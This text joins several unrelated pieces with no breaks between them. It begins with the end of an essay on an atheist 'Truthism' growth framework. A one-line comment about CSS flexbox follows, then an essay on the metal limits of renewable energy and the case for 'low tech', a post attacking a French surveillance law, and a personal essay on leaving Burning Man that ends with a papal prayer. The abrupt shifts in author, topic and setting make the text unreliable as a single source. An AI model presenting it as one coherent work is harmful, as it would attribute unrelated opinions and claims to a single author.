Of course, if this were my normal state, I’d be teaching monks somewhere on a mountain in Myanmar, and I’m not teaching any monks anywhere because it’s not my normal state. Whoa moments are rare, and very soon after one, I’m back down here being a human again. But the emotions and the clarity of Step 3 are so powerful that even after you topple off the step, some of it sticks around. Each time you humiliate the animals, a little bit of their future power over you is diminished. And that’s why Step 3 is so important—even though no one that I know can live permanently on Step 3, regular visits help you dramatically in the ongoing Step 1 vs Step 2 battle, which makes you a better and happier person.
Step 3 is also the answer to anyone who accuses atheists of being amoral or cynical or nihilistic, or wonders how atheists find any meaning in life without the hope and incentive of an afterlife. That’s a Step 1 way to view an atheist, where life on Earth is taken for granted and it’s assumed that any positive impulse or emotion must be due to circumstances outside of life. On Step 3, I feel immensely lucky to be alive and can’t believe how cool it is that I’m a group of atoms that can think about atoms—on Step 3, life itself is more than enough to make me excited, hopeful, loving, and kind. But Step 3 is only possible because science has cleared the way there, which is why Carl Sagan said that “science is not only compatible with spirituality; it is a profound source of spirituality.” In this way, science is the “prophet” of this framework—the one who reveals new truth to us and gives us an opportunity to alter ourselves by accessing it.
So to recap so far—on Step 1, you’re in a delusional bubble that Step 2 pops. On Step 2, there’s much more clarity about life, but it’s within a much bigger delusional bubble, one that Step 3 pops. But Step 3 is supposed to be total, fog-free clarity on truth—so how could there be another step?
Step 4: The Great Unknown
If we ever reach the point where we think we thoroughly understand who we are and where we came from, we will have failed. —Carl Sagan
The game so far has for the most part been clearing out fog to become as conscious as possible of what we as people and as a species know about truth:
Step 1-3 Circles
On Step 4, we’re reminded of the complete truth—which is this:
Step 4 Circle
The fact is, any discussion of our full reality—of the truth of the universe or our existence—is a complete delusion without acknowledging that big purple blob that makes up almost all of that reality.
But you know humans—they don’t like that purple blob one bit. Never have. The blob frightens and humiliates humans, and we have a rich history of denying its existence entirely, which is like living on the beach and pretending the ocean isn’t there. Instead, we just stamp our foot and claim that now we’ve finally figured it all out. On the religious side, we invent myths and proclaim them as truth—and even a devout religious believer reading this who stands by the truth of their particular book would agree with me about the fabrication of the other few thousand books out there. On the science front, we’ve managed to be consistently gullible in believing that “realizing you’ve been horribly wrong about reality” is a phenomenon only of the past.
Having our understanding of reality overturned by a new groundbreaking discovery is like a shocking twist in this epic mystery novel humanity is reading, and scientific progress is regularly dotted with these twists—the Earth being round, the solar system being heliocentric, not geocentric, the discovery of subatomic particles or galaxies other than our own, and evolutionary theory, to name a few. So how is it possible, with the knowledge of all those breakthroughs, that Lord Kelvin, one of history’s greatest scientists, said in the year 1900, “There is nothing new to be discovered in physics now. All that remains is more and more precise measurement”4—i.e. this time, all the twists actually are finished?
Of course, Kelvin was as wrong as every other arrogant scientist in history—the theory of general relativity and then the theory of quantum mechanics would both topple science on its face over the next century.
Even if we acknowledge today that there will be more twists in the future, we’re probably kind of inclined to think we’ve figured out most of the major things and have a far closer-to-complete picture of reality than the people who thought the Earth was flat. Which, to me, sounds like this:
Laughing
The fact is, let’s remember that we don’t know what the universe is. Is it everything? Is it one tiny bubble in a multiverse frothing with bubbles? Is it not a bubble at all but an optical illusion hologram? And we know about the Big Bang, but was that the beginning of everything? Did something arise from nothing, or was it just the latest in a long series of expansion/collapse cycles?5 We have no clue what dark matter is, only that there’s a shit-ton of it in the universe, and when we discussed The Fermi Paradox, it became entirely clear that science has no idea about whether there’s other life out there or how advanced it might be. How about String Theory, which claims to be the secret to unifying the two grand but seemingly-unrelated theories of the physical world, general relativity and quantum mechanics? It’s either the grandest theory we’ve ever come up with or totally false, and there are great scientists on both sides of this debate. And as laypeople, all we need to do is take a look at those two well-accepted theories to realize how vastly different reality can be from how it seems: like general relativity telling us that if you flew to a black hole and circled around it a few times in intense gravity and then returned to Earth a few hours after you left, decades would have passed on Earth while you were gone. And that’s like an ice cream cone compared to the insane shit quantum mechanics tells us—like two particles across the universe from one another being mysteriously linked to each other’s behavior, or a cat that’s both alive and dead at the same time, until you look at it.
And the thing is, everything I just mentioned is still within the realm of our understanding. As we established earlier, compared to a more evolved level of consciousness, we might be like a three-year-old, a monkey, or an ant—so why would we assume that we’re even capable of understanding everything in that purple blob? A monkey can’t understand that the Earth is a round planet, let alone that the solar system, galaxy, or universe exists. You could try to explain it to a monkey for years and it wouldn’t be possible. So what are we completely incapable of grasping even if a more intelligent species tried its hardest to explain it to us? Probably almost everything.
There are really two options when thinking about the big, big picture: be humble or be absurd.
The nonsensical thing about humans feigning certainty because we’re scared is that in the old days, when it seemed on the surface that we were the center of all creation, uncertainty was frightening because it made our reality seem so much bleaker than we had thought—but now, with so much more uncovered, things look highly bleak for us as people and as a species, so our fear should welcome uncertainty. Given my default outlook that I have a small handful of decades left and then an eternity of nonexistence, the fact that we might be totally wrong sounds tremendously hopeful to me.
Ironically, when my thinking reaches the top of this rooted-in-atheism staircase, the notion that something that seems divine to us might exist doesn’t seem so ridiculous anymore. I’m still totally atheist when it comes to all human-created conceptions of a divine higher force—which all, in my opinion, proclaim far too much certainty. But could a super-advanced force exist? It seems more than likely. Could we have been created by something/someone bigger than us or be living as part of a simulation without realizing it? Sure—I’m a three-year-old, remember, so who am I to say no?
To me, complete rational logic tells me to be atheist about all of the Earth’s religions and utterly agnostic about the nature of our existence or the possible existence of a higher being. I don’t arrive there via any form of faith, just by logic.
I find Step 4 mentally mind-blowing but I’m not sure I’m ever quite able to access it in a spiritual way like I sometimes can with Step 3—Step 4 Whoa moments might be reserved for Einstein-level thinkers—but even if I can’t get my feet up on Step 4, I can know it’s there, what it means, and I can remind myself of its existence. So what does that do for me as a human?
Well, remember that powerful humility I mentioned in Step 3? It multiplies that by 100. For reasons I just discussed, it makes me feel more hopeful. And it leaves me feeling pleasantly resigned to the fact that I will never understand what’s going on, which makes me feel like I can take my hand off the wheel, sit back, relax, and just enjoy the ride. In this way, I think Step 4 can make us live more in the present—if I’m just a molecule floating around an ocean I can’t understand, I might as well just enjoy it.
The way Step 4 can serve humanity is by helping to crush the notion of certainty. Certainty is primitive, leads to “us versus them” tribalism, and starts wars. We should be united in our uncertainty, not divided over fabricated certainty. And the more humans turn around and look at that big purple blob, the better off we’ll be.
Why Wisdom is the Goal
Nothing clears fog like a deathbed, which is why it’s then that people can always see with more clarity what they should have done differently—I wish I had spent less time working; I wish I had communicated with my wife more; I wish I had traveled more; etc. The goal of personal growth should be to gain that deathbed clarity while your life is still happening so you can actually do something about it.
The way you do that is by developing as much wisdom as possible, as early as possible. To me, wisdom is the most important thing to work towards as a human. It’s the big objective—the umbrella goal under which all other goals fall into place. I believe I have one and only one chance to live, and I want to do it in the most fulfilled and meaningful way possible—that’s the best outcome for me, and I do a lot more good for the world that way. Wisdom gives people the insight to know what “fulfilled and meaningful” actually means and the courage to make the choices that will get them there.
And while life experience can contribute to wisdom, I think wisdom is mostly already in all of our heads—it’s everything the Higher Being knows. When we’re not wise, it’s because we don’t have access to the Higher Being’s wisdom because it’s buried in fog. The fog is anti-wisdom, and when you move up the staircase into a clearer place, wisdom is simply a by-product of that increased consciousness.
One thing I learned at some point is that growing old or growing tall is not the same as growing up. Being a grownup is about your level of wisdom and the size of your mind’s scope—and it turns out that it doesn’t especially correlate with age. After a certain age, growing up is about overcoming your fog, and that’s about the person, not the age. I know some supremely wise older people, but there are also a lot of people my age who seem much wiser than their parents about a lot of things. Someone on a growth path whose fog thins as they age will become wiser with age, but I find the reverse happens with people who don’t actively grow—the fog hardens around them and they actually become even less conscious, and even more certain about everything, with age.
When I think about people I know, I realize that my level of respect and admiration for a person is almost entirely in line with how wise and conscious a person I think they are. The people I hold in the highest regard are the grownups in my life—and their ages completely vary.
Another Look at Religion in Light of this Framework:
This discussion helps clarify my issues with traditional organized religion. There are plenty of good people, good ideas, good values, and good wisdom in the religious world, but to me that seems like something happening in spite of religion and not because of it. Using religion for growth requires an innovative take on things, since at a fundamental level, most religions seem to treat people like children instead of pushing them to grow. Many of today’s religions play to people’s fog with “believe in this or else…” fear-mongering and books that are often a rallying cry for ‘us vs. them’ divisiveness. They tell people to look to ancient scripture for answers instead of the depths of the mind, and their stubborn certainty when it comes to right and wrong often leaves them at the back of the pack when it comes to the evolution of social issues. Their certainty when it comes to history ends up actively pushing their followers away from truth—as evidenced by the 42% of Americans who have been deprived of knowing the truth about evolution. (An even worse staircase criminal is the loathsome world of American politics, with a culture that lives on Step 1 and where politicians appeal directly to people’s animals, deliberately avoiding anything on Steps 2-4.)
So What Am I?
Yes, I’m an atheist, but atheism isn’t a growth model any more than “I don’t like rollerblading” is a workout strategy.
So I’m making up a term for what I am—I’m a Truthist. In my framework, truth is what I’m always looking for, truth is what I worship, and learning to see truth more easily and more often is what leads to growth.
In Truthism, the goal is to grow wiser over time, and wisdom falls into your lap whenever you’re conscious enough to see the truth about people, situations, the world, or the universe. The fog is what stands in your way, making you unconscious, delusional, and small-minded, so the key day-to-day growth strategy is staying cognizant of the fog and training your mind to try to see the full truth in any situation.
Over time, you want your [Time on Step 2] / [Time on Step 1] ratio to go up a little bit each year, and you want to get better and better at inducing Step 3 Whoa moments and reminding yourself of the Step 4 purple blob. If you do those things, I think you’re evolving in the best possible way, and it will have profound effects on all aspects of your life.
That’s it. That’s Truthism.
Am I a good Truthist? I’m okay. Better than I used to be with a long way to go. But defining this framework will help—I’ll know where to put my focus, what to be wary of, and how to evaluate my progress, which will help me make sure I’m actually improving and lead to quicker growth.
To help keep me on mission, I made a Truthism logo:
logo
That’s my symbol, my mantra, my WWJD—it’s the thing I can look at when something good or bad happens, when a big decision is at hand, or on a normal day as a reminder to stay aware of the fog and keep my eye on the big picture.
And What Are You?
My challenge to you is to decide on a term for yourself that accurately sums up your growth framework.
If Christianity is your thing and it’s genuinely helping you grow, that word can be Christian. Maybe you already have your own clear, well-defined advancement strategy and you just need a name for it. Maybe Truthism hit home for you, resembles the way you already think, and you want to try being a Truthist with me.
Or maybe you have no idea what your growth framework is, or what you’re using isn’t working. If either A) you don’t feel like you’ve evolved in a meaningful way in the past couple years, or B) you aren’t able to corroborate your values and philosophies with actual reasoning that matters to you, then you need to find a new framework.
To do this, just ask yourself the same questions I asked myself: What’s the goal that you want to evolve towards (and why is that the goal), what does the path look like that gets you there, what’s in your way, and how do you overcome those obstacles? What are your practices on a day-to-day level, and what should your progress look like year-to-year? Most importantly, how do you stay strong and maintain the practice for years and years, not four days? After you’ve thought that through, name the framework and make a symbol or mantra. (Then share your strategy in the comments or email me about it, because articulating it helps clarify it in your head, and because it’s useful and interesting for others to hear about your framework.)
I hope I’ve convinced you how important this is. Don’t wait until your deathbed to figure out what life is all about.
Flexbox looks really powerful for solving most of CSS's annoying problems :)
We now know the climate consequences of our massive use of fossil fuels. To replace them, nuclear power, of whatever generation, is credible neither industrially nor morally. Undeniably, we can and must develop renewable energy. But let's not imagine that renewables can replace fossil fuels and sustain our current energy extravagance.
The problems we face cannot be solved simply by a series of technological innovations and industrial deployments of alternative solutions, because we are going to run into a resource problem, for essentially two reasons: capturing renewable energy requires metal resources; and those metals can only be imperfectly recycled, a problem that gets worse as we rely on high technology. The climate solution can therefore only come through sobriety and appropriate, less resource-hungry technologies.
Energy and resources are intimately linked
The arguments are well known: renewable energy has enormous potential; and even though it is diffuse, partly intermittent, and still a bit too expensive today, continuous progress in production, storage, and transmission, together with massive deployment, should drive costs down and make it affordable.
It is true that the Earth receives every day thousands of times more solar energy than humanity needs. There is no shortage of scenarios for "energy-virtuous" worlds: the third industrial revolution of futurist Jeremy Rifkin, the Wind Water Sun plan of Professor Jacobson at Stanford University, the Desertec industrial project, or, at the French scale, the simulations of the Negawatt association or of ADEME.
All of them rely on very ambitious industrial deployments. Wind Water Sun proposes covering the energy needs of the entire world, with renewables alone, by 2030. That would require 3.8 million 5 MW wind turbines and 89,000 solar plants of 300 MW each: installing 19,000 GW of wind turbines in 15 years (30 times the current pace of at most 40 GW per year), and inaugurating fifteen solar plants per day.
A war economy
Nothing is impossible on paper, but it would take a genuine war economy to organize the supply of raw materials (steel, cement, polyurethane resins, copper, rare earths: to supply the neodymium for the permanent magnets in those turbines' generators, annual production would have to be multiplied by 15, assuming the reserves even exist!), the manufacturing of the equipment, the logistics and installation (ships, cranes, staging bases...), the training of personnel... Not to mention the systems needed to transport and store the electricity!
But the unrealism has more to do with resources than with industrial or financial constraints, because capturing, converting, and exploiting renewable energy requires metals. Being less concentrated and more intermittent, renewables produce fewer kWh per unit of metal (copper, steel) mobilized than fossil sources do. Some technologies use rarer metals, such as dysprosium-doped neodymium for high-power wind turbines, or indium, selenium, and tellurium for some high-efficiency photovoltaic panels. Metals are also needed for auxiliary equipment: cables, inverters, batteries.
We have plenty of metal resources, just as there remains an enormous amount of conventional and unconventional gas and oil, methane hydrates, and coal... far beyond what the planet's climate regulation can bear, alas.
But, as with oil and gas, the quality and accessibility of these mineral resources are degrading (for oil and gas, the ratio of energy recovered to energy invested in extraction has gone from 30-50 in onshore fields, to 5-7 in deep or ultradeep offshore operations, and even 2-4 for Alberta's tar sands). We are exploiting a stock of ores that were created and enriched by the "living" nature of the planet: plate tectonics, volcanism, the water cycle, biological activity...
Two problems at the same time
Logically, we exploited the most concentrated, easiest-to-extract resources first. New mines have lower ore grades than the exhausted ones (copper, for instance, has gone from an average of 1.8-2% in the 1930s to 0.5% in new mines), or are less accessible, harder to work, deeper.
Tar sands mining in Canada (Jørgen Schyberg/flickr/CC)
Yet whether mines are deeper or less concentrated, more energy must be spent, because ever more mine waste rock has to be moved, or because depth creates constraints, notably of temperature, that make operations more complex.
There is therefore a very strong interaction between the availability of energy and the availability of metals, and neglecting it would set us up for major disillusionment.
If we only had an energy (and climate!) problem, it would "suffice" to plaster the world with solar panels, wind turbines, and smart grids ("intelligent" transmission networks that optimize consumption and, above all, balance variable demand at every moment against the intermittent supply of renewables).
If we only had a metals problem, but access to concentrated and abundant energy, we could keep exploiting the Earth's crust at ever lower concentrations.
But we face both problems at the same time, and they reinforce each other: more energy is needed to extract and refine metals, and more metals are needed to produce energy that is less accessible.
The circular economy is a nice utopia
Metal resources, once extracted, do not disappear. The circular economy, based in particular on eco-design and recycling, should therefore be a logical answer to metal scarcity. But it can only work very partially unless we radically change the way we produce and consume.
Of course we can and must recycle more than we do today, and current recycling rates are often so low that there is huge room for improvement. But we can never reach 100% and recycle "indefinitely", even if we recovered every available resource and always processed it in the most modern plants, with the best-mastered processes (we are very far from that).
First because the resource must be physically recoverable to be recycled, which is impossible for dispersive or dissipative uses. Metals are commonly used as chemicals or additives, in glass, plastics, inks, paints, cosmetics, fungicides, lubricants, and many other industrial or everyday products (around 5% of zinc, 10 to 15% of manganese, lead, and tin, 15 to 20% of cobalt and cadmium, and, the extreme case, 95% of titanium, whose dioxide serves as the universal white pigment).
Second because it is hard to recycle properly. We design products of unprecedented diversity and complexity, made of composites, alloys, and ever more miniaturized and integrated components, yet our technological or economic capacity to identify the different metals, or to separate them, is limited.
The non-ferrous metals contained in alloyed steels from first melting are scrapped indiscriminately and end up in less noble uses, such as construction rebar. They have indeed been recycled, but they are functionally lost; future generations will no longer have access to them; they are "diluted". The use of the material is degraded: the "noble" metal ends up in low-grade steel, just as the plastic bottle ends up as a garden chair.
The real clean car is the bicycle!
"The clean car" is thus an absurd expression, even if cars ran on "100% clean" or "zero-emission" energy. Without a deep rethinking of their design, there will always be dispersive uses (various metals in the paint, tin in the PVC, zinc and cobalt in the tires, platinum released by the catalytic converter...), plus a body, metal parts, and on-board electronics that will be poorly recycled... The real clean car, or almost, is the bicycle!
Entropic or dispersive loss (at the source or in use), "mechanical" loss (through abandonment in nature, landfilling, or incineration), functional loss (through inefficient recycling): recycling is not a circle but a leaky pipe, and with every production-use-consumption cycle, part of the resource is lost for good. We can always improve. But without drastically revising the way we act, rates will remain desperately low for many small high-tech metals and rare earths (for most of them, less than 1% today), while for the major metals we will plateau at a typical 50 to 80%, which will remain far from enough.
Compacted aluminum cans before recycling (SB/Rue89 Bordeaux)
"Green" growth will be deadly
"Green" growth, at least as currently understood, rests on an all-technology approach. It will therefore only worsen the phenomena we have just described, only overheat the system, because these "green" innovations generally rely on less abundant metals, increase product complexity, and call on high-tech components that are harder to recycle. So it goes for the latest renewable energy technology, "smart" buildings, and electric, hybrid, or hydrogen cars...
A sufficiently massive deployment of decentralized renewables, of an "internet of energy", is unrealistic. The metaphor may smell sweetly of the "dematerialized" economy, but that is forgetting a little too quickly that electrons are not transported like photons, and that energy is not stored as easily as bytes. Producing, storing, and transporting electricity, even "green" electricity, takes a great deal of metal. And there is no Moore's law (which posits the doubling of transistor density roughly every two years) in the physical world of energy.
But a purely technological fight against climate change will be just as hopeless.
Take cars, where the need to maintain comfort, performance, and safety requires ever more precise alloyed steels to shave off a little weight and reduce CO2 emissions. Whereas we should instead limit speed and cap engine power, which would in turn allow reducing weight and cutting fuel consumption. The car that uses one liter per hundred kilometers is within reach! It just has to weigh 300 or 400 kg and not exceed 80 km/h.
Or buildings, where ever more demanding comfort levels require rare materials (low-emissivity glass) and generalized electronics to optimize consumption (building management systems, sensors, motors and automation, controlled mechanical ventilation).
With "green" growth, we would like to tap the brake timidly while keeping the pedal to the floor: more than ever, our economy favors the disposable, obsolescence, acceleration, the replacement of service jobs by machines stuffed with electronics, with drones and robots on the way. What awaits us in the short term is a devastating and deadly acceleration of resource extraction, of electricity consumption, of unmanageable waste production, with the widespread deployment of nanotechnology, big data, and connected devices. The ransacking of the planet is only beginning.
The climate solution will come through "low tech"
We need to take the true measure of the necessary transition and admit that there will be no way out on top through technological innovation, or that it is in any case so improbable that it would be perilous to bet everything on it. We cannot settle for the emerging business models, based on the sharing economy or on selling use rather than ownership, which may be wonderful but are neither generalizable nor sufficient.
We will have to reduce, in absolute terms, the quantity of energy and materials consumed. We must work on lowering demand, not on replacing supply, while keeping an acceptable level of "comfort".
That is the whole idea of low tech, as opposed to the high tech that is driving us into the wall, since high tech consumes more rare resources and moves us further away from any possibility of efficient recycling and a circular economy. Promoting low tech is above all an approach, neither obscurantist nor necessarily opposed to innovation or "progress", but oriented toward saving resources, and it consists of asking three questions.
Why do we produce? First, we must intelligently question our needs and reduce, at the source and as much as possible, the extraction of resources and the resulting pollution. It is a delicate exercise, because human needs, fed by mimetic rivalry, are in principle infinitely extensible, so it is impossible to decree "scientifically" the boundary between fundamental needs and the "superfluous", which is also part of the spice of life. All the more delicate since, while we're at it, this exercise had better be carried out democratically.
There is a whole range of conceivable actions, more or less complicated, more or less acceptable.
Some should logically reach consensus, or nearly so, provided the arguments are laid out well (eliminating certain disposable items, advertising displays, bottled water...).
Others will be a bit harder to push through, though frankly we would lose almost no "comfort" (bringing back deposit-return schemes, reusing objects, composting waste, vehicle speed limits...).
Others, finally, promise some stormy debates (drastically cutting back on cars in favor of bicycles, adjusting building temperatures, rethinking urban planning to reverse the trend toward hypermobility...).
Who is really killing freedom?
Freedom-killing? Certainly, but our societies already restrict freedom. Public authorities already set limits on power and weight for registering vehicles. Why couldn't those limits evolve? One of the fundamental principles of living in society is that one person's freedom had best end where another's begins. Since we have only one planet and our wasteful consumption endangers the very conditions of human life (and that of many other species) on Earth, who is really killing freedom? The SUV driver, the private jet user, the yacht owner, or the person who proposes banning these machines of deferred death?
What do we produce? Next, we must considerably extend product lifetimes, ban most disposable or dispersive products unless they are made entirely from renewable and non-polluting resources, and deeply rethink the design of objects: repairable, reusable, easy to identify and dismantle, recyclable at end of life without loss, using rare and irreplaceable resources as little as possible, containing as little electronics as possible, even if that means revising our "specifications": accepting aging or the reuse of what already exists, plainer aesthetics for functional objects, sometimes lower performance or a loss of efficiency... roughly, grandma's coffee grinder and stovetop espresso pot rather than the latest espresso machine. In the energy field, this could take the form of micro and mini hydro, small intermittent "village" wind turbines, solar thermal for hot water and cooking, heat pumps, biomass...
How do we produce? Finally, there is thinking to be done about our modes of production. Should we keep chasing productivity and economies of scale in giga-factories, or are human-scale workshops and companies better? Shouldn't we reconsider the place of humans, the degree of mechanization and robotization, the way we currently trade off between labor and resources/energy? And our relationship to work (sharing it better among everyone, the value of extreme specialization, the split of time between salaried work and domestic activities, etc.)?
And then there is the acute question of where production is located. After decades of globalization, made easy by sufficiently cheap oil and container shipping, the system has become absurd.
In an era of coming disruptions, of social or international tensions, of future geopolitical risks that climate change or resource shortages are likely to generate, not to mention possible health scandals, is a system based on China as "factory of the world" really resilient?
A project for society
To succeed in such a shift, indispensable yet so against the current, many questions will have to be resolved, starting with employment. "Growth means jobs" has been hammered home so much that it is hard to talk about sobriety without scaring people.
Despite the obviousness of the environmental emergencies, any ecological radicalism, any far-reaching regulatory or fiscal change, even a gradual one, indeed any fundamental reflection at all, is forbidden by the (legitimate) terror of destroying jobs. Once it is accepted that growth is not coming back (we are slowly getting there), and all the better given its environmental effects, we will have to convince ourselves that full employment, or full activity, is perfectly achievable in a resource-frugal, post-growth world.
We will also have to ask at what territorial scale to carry out this transition, somewhere between global governance, impossible within the time available, and local individual and collective experiments, wonderful but insufficient. Even embedded in the global trading system, a country or a small group of countries could take the lead and, protected by well-thought-out customs measures, set a real movement in motion, one carrying hope and radicalism.
Given the forces at play, there is of course a utopian element in such a project for society. But let's not forget that the status quo scenario is probably even more unrealistic, with promises of technological happiness that will not be kept and a world sinking into an endless crisis, not to mention the risks of political upheaval fed by ever greater frustration. Why not try another route? We have ample means, technical, organizational, financial, societal, and cultural, to carry out such a transition. Provided we want to.
It's no scoop: I took part, in my own small way, in the fight against the villainous intelligence law. It's no surprise: I was more than disappointed by the Conseil Constitutionnel's ruling on it. But that is not the subject of this post. With hindsight, it seems obvious that we (the law's opponents) failed to make ourselves understood by the general public. The text was complex, its stakes highly technical or highly philosophical, and we chose to explain them: that was probably a mistake.
While the bill's backers preferred to play the emotional register ("If you don't vote for this text, you will be responsible for the next attack") or the demagogic one ("if you are against us, you are with the terrorists"), we wore ourselves out dissecting the danger of the "black boxes" and their algorithms, invoking Foucault and the panopticon, and recalling the importance of privacy for freedom of thought.
On that ground, the battle for popular support was lost in advance: against populism, betting on intelligence usually loses.
An unprecedented unanimity
Still, one point remains remarkable: never, in 20 years of fighting for civil liberties, had I seen such unanimity from the poorly named "civil society" against a bill. Never. From the SNJ to the Syndicat de la Magistrature, from the UN to the Council of Europe, from La Quadrature du Net to the LDH, by way of judge Trévidic and the Défenseur des Droits Jacques Toubon: all of them opposed this text, with more or less the same reservations. It would in fact be much quicker to list the organizations or associations that defended it: there are none.
And of this outcry, which (another novelty) was well covered in the media, the government saw nothing and heard nothing. Before both chambers, it was waved away with the back of a hand, when it wasn't denigrated or caricatured.
We were accused in turn of having exerted "odious pressure" on MPs (because it is well known how shameful it is for citizens to try to influence their representatives' votes), of being "amateur exegetes" who understood nothing of the law's "legalese", or of being mere "digitalists" (as if understanding the stakes of new technologies could only disqualify those who try).
As for the rare parliamentarians who tried to relay these concerns, they were mocked, denigrated, and ridiculed by ministers standing "firm in their boots" and totally deaf to the arguments being made. No amendment, no challenge to the text as presented was accepted. And always in the name of the sacrosanct fight against terrorism (which, it must be said again, was not even the law's main purpose).
Having followed parliamentary debates more or less regularly, I had never seen anything like it. Never seen so much rejection from every concerned body society has to offer, met with so much immobility from the government. When you see, in parallel, how the same government backed down without the slightest hesitation before the revolt of the bonnets rouges, the FNSEA, or other less well-known lobbies over bills that did not touch fundamental liberties, and when you see with what hatred the ministers and the great majority of elected officials spoke of the Internet during the debates, to the point of turning it into an insult, it strikes me as highly symptomatic.
A rancid smell.
But symptomatic of what?
Before reacting to all this, I wanted to step back. Stepping back perhaps allowed me to connect this symptom to others, unrelated to the intelligence law, but which all seem to me to stem from the same disease: a galloping neoconservatism, a reactionary way of thinking so "uninhibited" that it has spread far beyond its natural right-wing habitat and has widely seeped in, including within the big so-called "left-wing" parties.
When Jean-Jacques Urvoas rejoices on Twitter (https://twitter.com/JJUrvoas/status/624324424393592832) over the Conseil Constitutionnel's decision on (sic) 'the "rens." law' (short for renseignement, and a near-homophone of rance, "rancid"), the slip is revealing. What could be more rancid, indeed, than this reaffirmed desire for social control, for mass surveillance capable of imposing a moral order from above, once guaranteed by the church, whose return a whole, equally rancid, segment of society longs for?
What I see, well beyond this law and the way it was passed, is a rupture. A divide that is far from being merely "digital".
The temporal divide.
When a large part of society is searching for new modes of consumption, more respectful of the environment and more ethical too, and is developing a culture of sharing (of resources, music, knowledge...), while the state abandons the ecotax, props up intensive agriculture at the expense of small farms (http://www.politis.fr/Un-gouvernement-a-la-botte-de-la,32260.html), and fights every innovation that might threaten rents dating back to the last century (the private-copy levy extended to the "cloud", the TV licence fee extended to set-top "boxes", the Thevenoud law imposing a 15-minute wait on ride-hailing drivers, and so many others...).
When another part of society, the poorest, stops thinking about the future for lack of being able to picture itself in it, and has no hope left but a return to a past it believes was better, egged on by every demagogue and populist the political class has to offer, and dragging along a few old self-proclaimed intellectuals, overtaken by the modern world, who cannot find words harsh enough to condemn what they lack the means to understand.
Everything happens as if we had, on one side, a population turned toward the future, imagining a modernized democracy and a collaborative, social, solidarity-based economy, adapting to digital novelties (like Michel Serres's petite poucette) but just as capable of imagining a public debate on universal income, the decriminalization of soft drugs, or the welcoming of refugees, and on the other side a political class resolutely turned toward an archaic past, dreaming of school uniforms, moral instruction in schools, a ban on same-sex marriage, and a paternalism resting on the stacking of elected offices, cronyism, and corruption.
While some wish for the censorship of online pornography, or the return of the "saint of the day" and something to replace the church in its role as moral guide, others are thinking startups, liquid democracy, free speech, post-capitalism, and privacy protection.
And, alas, this "temporal divide" sweeps along with it all of society's excluded and left-behind, and all the old rancid hatreds of the other, whoever that other may be, pushing them to believe in the good old scapegoat (yesterday the Jew, today the Muslim) responsible for all their ills, to hope that a return to old "values" will give them back a power (which they never had) over their own future, and to vote for whoever best strikes the marshal-like pose of the supreme savior.
That, I believe, is the meaning we should give to the manifest desire of our leaders, from one side or the other, to "civilize" (read: "control, surveil, and censor") the Internet, as the symbol of all their fears, of all their ignorance, and of all the hopes for a social innovation that they blindly reject.
We could call it the quarrel of the ancients and the moderns 2.0, if it weren't, alas, one more symptom of the rot of the Fifth Republic and of our democracy.
Make no mistake: the "invasion of the barbarians" dear to Nicolas Colin is under way, and backward-looking postures will not protect a society that seems to prefer withdrawing into itself over opening up to others. Without a radical transformation of political discourse, if we cannot put imagination in power rather than nostalgia for a past that never existed, it won't only be our laws that turn rancid.
It will be our entire society.
I have gone to Burning Man 15 years in a row. When I went the first time, back in 2000, I was a journalist on assignment for Rolling Stone. That was an amazing introduction to the event, as I was able to go “back stage” and meet the organizers, artists, and geniuses behind the sculptures, lasers, and camps. I was immediately hooked. I couldn’t believe such a place existed – that tens of thousands of people shared the same ideals, and worked together to realize their visions.
I wrote this piece about my experiences. I also wrote a feature about the festival for ArtForum. By proposing that Burning Man had validity as an artistic expression – I discussed Joseph Beuys’ idea of “social sculpture” – I got banned from ArtForum after they published my piece. I also wrote about the festival, personally and philosophically, in Breaking Open the Head, my first book, and 2012: The Return of Quetzalcoatl, my second. Burning Man has had a profound effect on my life, in many ways.
This year, I am skipping it. There are a few reasons for this, but the main one is that I feel Burning Man – an institution in its own process of ongoing change and evolution – has lost its way. Hopefully, this is temporary. I know and love many of the people who create and run the festival, and believe in their intentions and their vision.
Burning Man has accomplished amazing things, opening up whole new realms of individual freedom and cultural expression. At the same time the festival has become a bit of a victim of its own success. It has become a massive entertainment complex, a bit like Disney World for a contingent made up mostly of the wealthy elite. It always had this vibe, to some extent, but it seems more pronounced in recent years. It feels like there is more and more of less and less. The potential for some kind of authentic liberation or awakening seems increasingly obscure and remote.
The change in Burning Man – admittedly it is subtle – is happening as our world slides toward ecological catastrophe. The ecological crisis has become my almost monomaniacal focus recently. From my perspective, it is crucial that people awaken to what is happening to our Earth. We need to quickly understand and then start making the changes necessary to ensure the continuity of our ecosystems. Part of my enthusiasm for Burning Man was that it seemed a place where a new human community could arise – a new way of being. This potential is still there – but it seems like it has been co-opted, distorted.
At Burning Man, there was always a tension between two world views, which I would characterize as libertarian hedonism and mystical anarchism. I feel, as a result of its rapid growth and, also, as the festival has become a magnet for the wealthy elite (the Silicon Valley crowd, the media moguls and their entourages, the Ibiza crowd, etc), it has tilted too far toward libertarian hedonism. Art cars have become the new yachts, representing expressions of massively inflated egos. Wealthy camps will drop hundreds of thousands on a vehicle, then parade it around, with a velvet rope vibe. Increasingly, the culture of Burning Man feels like an offshoot of the same mindless, self-interested, nihilistic worldview and neoliberal economics that are rapidly annihilating our shared life-world.
I remember, a few years back, I stayed near a camp that had been built for the founder of Cirque du Soleil, Guy Laliberté, and his friends. The camp was empty throughout the week. There were many beautiful gypsy caravan-style tents set up, awaiting the weekend visitors from Europe and Ibiza. There were also a few Mexican workers who labored over the course of the week, building shade structures and decorating the art cars. Nobody had offered these workers a place to stay in one of the carefully shaded luxury tents, so they had pitched their small nylon tent directly in the hot sun. That image seems to sum up where Burning Man has drifted, inexorably.
We lack a moral center in our society, and we are rapidly caroming toward the abyss. It is absolutely extraordinary – in itself, miraculous – that the new Pope, Pope Francis, has shown up as one of the only people in our entire planetary culture able to speak directly to the needs of our moment – he calls for an “ecological conversion,” for shared sacrifice on the part of the wealthy elite, a new mode of empathic and compassionate action for us all. In the Encyclical, Care for Our Common Home, Francis writes:
All-powerful God, you are present in the whole universe
and in the smallest of your creatures.
You embrace with your tenderness all that exists.
Pour out upon us the power of your love,
that we may protect life and beauty.
Fill us with peace, that we may live as brothers and sisters, harming no one.
O God of the poor,
help us to rescue the abandoned and forgotten of this earth,
so precious in your eyes.
Bring healing to our lives, that we may protect the world and not prey on it,
that we may sow beauty, not pollution and destruction.
